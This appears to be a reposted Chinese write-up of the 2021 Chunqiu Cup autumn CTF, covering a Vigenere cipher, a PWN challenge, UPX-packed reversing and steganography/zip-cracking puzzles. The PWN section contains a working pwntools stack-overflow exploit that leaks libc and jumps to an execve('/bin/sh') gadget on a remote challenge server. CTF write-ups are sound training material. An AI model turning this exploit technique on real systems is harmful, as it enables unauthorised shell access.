2021年春秋杯网络安全联赛秋季赛writeup

痛定思痛。 2024-04-07 11:12 74阅读 0赞

### Crypto ###

#### Vigenere ####

在[https://www.boxentriq.com/code-breaking/vigenere-cipher][https_www.boxentriq.com_code-breaking_vigenere-cipher] 网站爆破得到为key:asterism

[![image-20211127100844149][]][image-20211127100844149 1]

解密得到falg。

[![image-20211127162758654][]][image-20211127162758654 1]

或者

根据题目Vigenere可看出是维吉尼亚密码

![9b02547778668a044abfa98d3a14ac37.png][]

使用在线解码工具破解

https://guballa.de/vigenere-solver

![97b0f6009d6e9efdf12724d5733a5487.png][]

flag：flag\{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648\}

### PWN ###

#### supercall ####

简单栈溢出，利用[LibcSearcher][]通过题目泄露出的\_IO\_2\_1\_stdin\_的真实地址找到 libc 基地址，用one\_gatget 来get shell。

#!/usr/bin/env python
    # -*- encoding: utf-8 -*-
    
    '''
    @File    :   exp.py
    @Time    :   2021/11/27 13:39:07
    @Author  :   lexsd6
    '''
    
    from pwn import * 
    from libcfind import *
    
    local_mote=0
    elf='./supercall'
    e=ELF(elf)
    #context.log_level = 'debug'
    context.arch=e.arch
    ip_port=['123.57.207.81',16985]
    
    debug=lambda : gdb.attach(p) if local_mote==1 else None
    
    if local_mote==1 :
       p=process(elf)
    else :
       p=remote(ip_port[0],ip_port[-1])
    
    #0x0000000000026796 : pop rdi ; ret
    stack_addr=int(p.recvuntil(',')[:-1],16)
    stdin_addr=int(p.recv(),16)
    log.info(hex(stack_addr))
    log.info(hex(stdin_addr))
    
    x=finder('_IO_2_1_stdin_',stdin_addr,num=9)
    #[-] 9: local-46e93283ff53133360e02a73ae5b5ba375410855 (source from:/mnt/d/filewsl/supercall/libc-2.27.so)
    
    p.sendline('1'*8+'2'*8+'3'*7)
    p.sendline('\x00'*0x10+'x'*8+p64(x.ogg(num=0)))
    """
    [-] 0: 0x4f3d5  execve("/bin/sh", rsp+0x40, environ)
    constraints:
      rsp & 0xf == 0
      rcx == NULL
    """
    p.interactive()

再在远程cat flag.

\[+\] you choose gadget: 0x4f3d5\[\*\] Switching to interactive mode$ lsbindevflagliblib32lib64supercall$ cat f\*flag\{2f3f3632-6484-4c00-82f3-a63e0d4340d9\}$

### RE**Snake** ###

发现题目有UPX壳，脱壳后，用ida打开审阅发现一疑似加密flag函数

int sub_40186F()
    {
         
      char v1[256]; // [esp+18h] [ebp-910h]
      char Dst[2048]; // [esp+118h] [ebp-810h]
      int j; // [esp+918h] [ebp-10h]
      int i; // [esp+91Ch] [ebp-Ch]
    
      sub_4021AD(22, 18);
      scanf("%s", v1);
      for ( i = 0; v1[i]; ++i )
        ;
      sub_4017D2(v1, i);#fun2
      memset(Dst, 0, 0x800u);
      sub_4015F7(v1, Dst, i); #fun1
      sub_4021AD(22, 20);
      for ( j = 0; Dst[j]; ++j )
      {
         
        if ( Dst[j] != a7g5d5bayTmdlwl[j] )
          return puts("不对哦~下次再来吧~");
      }
      return puts(asc_405016);
    }

继续跟进fun2发现：

int __cdecl sub_4017D2(int a1, int a2)
    {
         
      int result; // eax
      int j; // [esp+8h] [ebp-Ch]
      signed int i; // [esp+Ch] [ebp-8h]
    
      for ( i = 1; i <= 10; ++i )
      {
         
        for ( j = 0; ; ++j )
        {
         
          result = *(unsigned __int8 *)(j + a1);
          if ( !(_BYTE)result )
            break;
          if ( a2 % i )
            *(_BYTE *)(j + a1) ^= (_BYTE)i + (_BYTE)j;
          else
            *(_BYTE *)(j + a1) ^= (unsigned __int8)(j % i) + (_BYTE)j;
        }
      }
      return result;
    }

是对我们的输入字符串，每一个字符按位置进行与操作。

fun1是字符串的base64加密。

while ( v16 < a3 )
    {
         
      v3 = v13;
      v14 = v13 + 1;
      *(_BYTE *)(a2 + v3) = Str[((signed int)*(unsigned __int8 *)(v16 + a1) >> 2) & 0x3F];
      v11 = 16 * *(_BYTE *)(v16 + a1) & 0x30;
      if ( v16 + 1 >= a3 )
      {
         
        v4 = v14;
        v5 = v14 + 1;
        *(_BYTE *)(a2 + v4) = Str[v11];
        *(_BYTE *)(v5 + a2) = '=';
        v6 = v5 + 1;
        v13 = v5 + 2;
        *(_BYTE *)(v6 + a2) = '=';
        break;
      }
      v7 = v14;
      v15 = v14 + 1;
      *(_BYTE *)(a2 + v7) = Str[((signed int)*(unsigned __int8 *)(v16 + 1 + a1) >> 4) & 0xF | v11];
      v12 = 4 * *(_BYTE *)(v16 + 1 + a1) & 0x3C;
      if ( v16 + 2 >= a3 )
      {
         
        *(_BYTE *)(a2 + v15) = Str[v12];
        v8 = v15 + 1;
        v13 = v15 + 2;
        *(_BYTE *)(v8 + a2) = '=';
        break;
      }
      *(_BYTE *)(a2 + v15) = Str[((signed int)*(unsigned __int8 *)(v16 + 2 + a1) >> 6) & 3 | v12];
      v9 = v15 + 1;
      v13 = v15 + 2;
      *(_BYTE *)(a2 + v9) = Str[*(_BYTE *)(v16 + 2 + a1) & 0x3F];
      v16 += 3;
    }

但在调试时，发现在fun1之前，有个函数将全局变量str值改动了

这个函数如下：

signed int sub_401536()
    {
         
      char v0; // ST13_1
      signed int result; // eax
      signed int v2; // [esp+14h] [ebp-14h]
      int j; // [esp+18h] [ebp-10h]
      int i; // [esp+1Ch] [ebp-Ch]
    
      v2 = strlen("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
      for ( i = 0; v2 / 2 > i; ++i )
      {
         
        for ( j = 0; v2 - i - 1 > j; ++j )
        {
         
          if ( Str[j] > Str[j + 1] )
          {
         
            v0 = Str[j];
            Str[j] = Str[j + 1];
            Str[j + 1] = v0;
          }
        }
      }
      result = 1;
      dword_406060 = 1;
      return result;
    }

于是写脚本还愿str：

base_flag=[]
    #x='7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'
    x="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    v2 = len("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")
    """
    for ( i = 0; v2 / 2 > i; ++i )
      {
          
        for ( j = 0; v2 - i - 1 > j; ++j )
        {
          
          if ( Str[j] > Str[j + 1] )
          {
          
            v0 = Str[j];
            Str[j] = Str[j + 1];
            Str[j + 1] = v0;
          }
        }
    """
    for i in x:
        base_flag.append(ord(i))
    print(base_flag)
    for i in range(v2//2):
        for j in range(v2-i-1):
            if base_flag[j]>base_flag[j+1]:
                v0=base_flag[j]
                base_flag[j]=base_flag[j+1]
                base_flag[j+1]=v0

得到真正的str：ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz

在对fun1函数和fun2函数逆向换源，得到flag：

import base64
    table = 'ABCDEFGHIJKLMNOPQRST0123456789+/UVWXYZabcdefghijklmnopqrstuvwxyz'
    table2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    
    tmp = '7G5d5bAy+TMdLWlu5CdkMTlcJnwkNUgb2AQL3CcmPpVf6DAp72scOSlb'
    tmp2 = ''
    for i in tmp:
    	index = table.index(i)
    	tmp2 += table2[index]
    	
    k=base64.b64decode(tmp2+'==')
    nre=''
    kk=[]
    
    for i in range(len(k)):
        kk.append(ord(k[i]))
    
    print(kk)
    a2=len(kk)
    for i in range((10)):
        i=i+1
        for j in range(len(kk)):
    
            print(str(a2%i)+''+str(i))
            if a2%i!=0:
                kk[j]^=(i+j)
            else :
                kk[j]^=((j%i)+j)
        print(kk)
    
    #print(k)
    print(kk)
    flag=''
    for i in (kk):
        flag+=chr(i)
    
    print(flag)

出flag flag{5e2200bc-f21a-5421-a90b-57dec19fe196}

### MISC ###

#### 问卷调查 ####

填完表就有flag

flag\{ 让我们一起带给世界安全感\}

### helloshark ###

一张图片

![786b6ccbc6b2b6518e3cb01c1cea5ae4.png][]

010打开发现16进制有许多PK字样，对图片进行分离处理(foremost)

果然隐藏了压缩包，但是压缩包设置了密码，提示密码在图片里

![4b719629601e474da33d2d757f59811a.png][]

猜测图片存在LSB隐写，使用工具zsteg进行检测

![618c2ef35508ebe2c401e6720b8a4497.png][]

可以看到password为@91902AF23C\#276C2FC7EAC615739CC7C0

解压压缩包，打开流量包

追踪TCP流

![4f35ac0daf85d9fd12d0b54e48d943c8.png][]

拼接flag

![bbb300cf582c631ca8217303bd1c77dd.png][]

拿到flag：flag\{a4e0a418-fced-4b2d-9d76-fdc9053d69a1\}

### secret\_chart ###

一张图片

![8ff983938d8411c3ae934a3675c5a4c2.png][]

老样子，拉010，分离

得到一个加密的压缩包

![de00d316a9b703d65171f9e231a98f26.png][]

密码没有给出任何提示，尝试爆破，成功，密码9527

![fefc358842bc62d833f47ff960e4801f.png][]

解压，打开excel文件

![24da72789c8ef0012a7e688d1c107486.png][]

表格是由6个月份构成的，左侧和底边都是1，猜测是二维码

先将6个月份的数据放在一起，并把行高列宽统一一下

![59dba409b71ab0c5237bffc03ac121c1.png][]

添加个条件格式，字符串包含1的时候背景填充为黑色

![bd12e0434cc41b75709dd544ffc4c9c7.png][]

微信扫描不出来，截图二维码

![fe79a0b629928345ac7ed1aaae6c69c5.png][]

DataMatrix二维码在线解码工具

http://boy.co.ua/decode.php

解码得到一个像flag的字符串

zfua\{B3s1o9in1Nw0halUnofuNc0HM1\}

凯撒密码解密

![d0b298834b6a0aa9ac9c3a01b24b522f.png][]

拿到flag：flag\{H3y1u9ot1Tc0ngrAtulaTi0NS1\}

from： [https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/\#Crypto][https_lexsd6.github.io_2021_11_27_2021_E5_B9_B4_E6_98_A5_E7_A7_8B_E6_9D_AF_E7_BD_91_E7_BB_9C_E5_AE_89_E5_85_A8_E8_81_94_E8_B5_9B_E7_A7_8B_E5_AD_A3_E8_B5_9B_E5_8B_87_E8_80_85_E5_B1_B1_E5_B3_B0_Crypto]

[https_www.boxentriq.com_code-breaking_vigenere-cipher]: https://www.boxentriq.com/code-breaking/vigenere-cipher
[image-20211127100844149]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/871f2052507144c6946fba7abe530c7e.png
[image-20211127100844149 1]: https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/image-20211127100844149.png
[image-20211127162758654]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/19a7d1f245a44cbf80835b8960f05aa2.png
[image-20211127162758654 1]: https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/image-20211127162758654.png
[9b02547778668a044abfa98d3a14ac37.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/41cf21b8033e4b4591bde06293e1f065.png
[97b0f6009d6e9efdf12724d5733a5487.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a2a80b04a30146d783585a056ec61d17.png
[LibcSearcher]: https://github.com/lexsd6/LibcSearcher_plus
[786b6ccbc6b2b6518e3cb01c1cea5ae4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/74c95027c1f0464eb366f4c7924d0b57.png
[4b719629601e474da33d2d757f59811a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/21b396e5d43c4a01b57a585c689c8359.png
[618c2ef35508ebe2c401e6720b8a4497.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/26f812fc3cd44b1cbb0e16db3a9b4053.png
[4f35ac0daf85d9fd12d0b54e48d943c8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6d27ec75eecc46ef9a88c68ab5867403.png
[bbb300cf582c631ca8217303bd1c77dd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c03daa6f7e6f4f0b8e8200b5c005d838.png
[8ff983938d8411c3ae934a3675c5a4c2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/fae4a65de7494cf088b8dd10ba0922bb.png
[de00d316a9b703d65171f9e231a98f26.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f20156bad92f4973baed49c5ae453abc.png
[fefc358842bc62d833f47ff960e4801f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8f438b9bbcd848b78a6731263dd8e17c.png
[24da72789c8ef0012a7e688d1c107486.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f67e3a1423d34283abe8607d32ee4c38.png
[59dba409b71ab0c5237bffc03ac121c1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/55bf49586135400482eebf60bf03333f.png
[bd12e0434cc41b75709dd544ffc4c9c7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/362188eff1bd4d2eaebd9dd7a09f297c.png
[fe79a0b629928345ac7ed1aaae6c69c5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8f7cf7d31ddc40af90a720681aab4101.png
[d0b298834b6a0aa9ac9c3a01b24b522f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a97979b1b2c74a11805759626f56f0fd.png
[https_lexsd6.github.io_2021_11_27_2021_E5_B9_B4_E6_98_A5_E7_A7_8B_E6_9D_AF_E7_BD_91_E7_BB_9C_E5_AE_89_E5_85_A8_E8_81_94_E8_B5_9B_E7_A7_8B_E5_AD_A3_E8_B5_9B_E5_8B_87_E8_80_85_E5_B1_B1_E5_B3_B0_Crypto]: https://lexsd6.github.io/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/#Crypto